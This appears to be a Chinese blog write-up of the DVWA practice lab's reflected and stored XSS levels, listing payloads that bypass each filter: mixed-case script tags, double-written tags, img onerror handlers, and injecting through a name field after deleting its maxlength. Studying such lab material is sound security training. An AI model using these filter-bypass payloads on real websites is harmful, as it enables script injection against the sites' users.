DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法

目录

1.DVWA反射型xss

(1)Low:

(2)Medium:

(3)Heigh

2.xss存储型

(1)Low:

(2)Medium

(3)Heigh


1.DVWA反射型xss

(1)Low:

输入<script>alert(1)</script>

点击submit则会有弹窗显示

(2)Medium:

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

发现<script>被丢掉了,因此考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>=

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

没有弹窗显示

(3)Heigh

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

包含/<script>任意一个字母就会被丢掉

所以不能使用<script>标签去做

所以尝试用<img>

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

2.xss存储型

(1)Low:

输入<script>alert(1)</script>

有弹窗显示

(2)Medium

输入<script>alert(1)</script>

点击提交

没有弹窗

尝试大小写,双写,img,HTML编码均没有反应

那么就尝试换个方向

去改变它的name,尝试在name中注入xss

因为查看源代码时发现neme的长度最大时10

那么我们则需要去修改源代码把maxlength删除,删除之后再在name插入xss代码

考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

html 复制代码
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

没有弹窗显示

(3)Heigh

与中级同理在尝试从message注入不成功后,便转为在name上面注入

尝试用img标签注入

<img src=# οnerrοr=alert(1)>

有弹窗显示

相关推荐
雨雨雨雨雨别下啦18 分钟前
【从0开始学前端】vue3简介、核心代码、生命周期
前端·vue.js·vue
simon_934936 分钟前
受够了压缩和收费?我作为一个码农,手撸了一款无限容量、原图直出的瀑布流相册!
前端
e***87701 小时前
windows配置永久路由
android·前端·后端
u***27611 小时前
TypeScript 与后端开发Node.js
javascript·typescript·node.js
星空的资源小屋1 小时前
跨平台下载神器ArrowDL,一网打尽所有资源
javascript·笔记·django
Dorcas_FE2 小时前
【tips】动态el-form-item中校验的注意点
前端·javascript·vue.js
小小前端要继续努力2 小时前
前端新人怎么更快的融入工作
前端
八月ouc2 小时前
解密JavaScript模块化演进:从IIFE到ES Module,深入理解现代前端工程化基石
javascript·es6·模块化·cmd·commonjs·amd·iife
四岁爱上了她2 小时前
input输入框焦点的获取和隐藏div,一个自定义的下拉选择
前端·javascript·vue.js
fouryears_234172 小时前
现代 Android 后台应用读取剪贴板最佳实践
android·前端·flutter·dart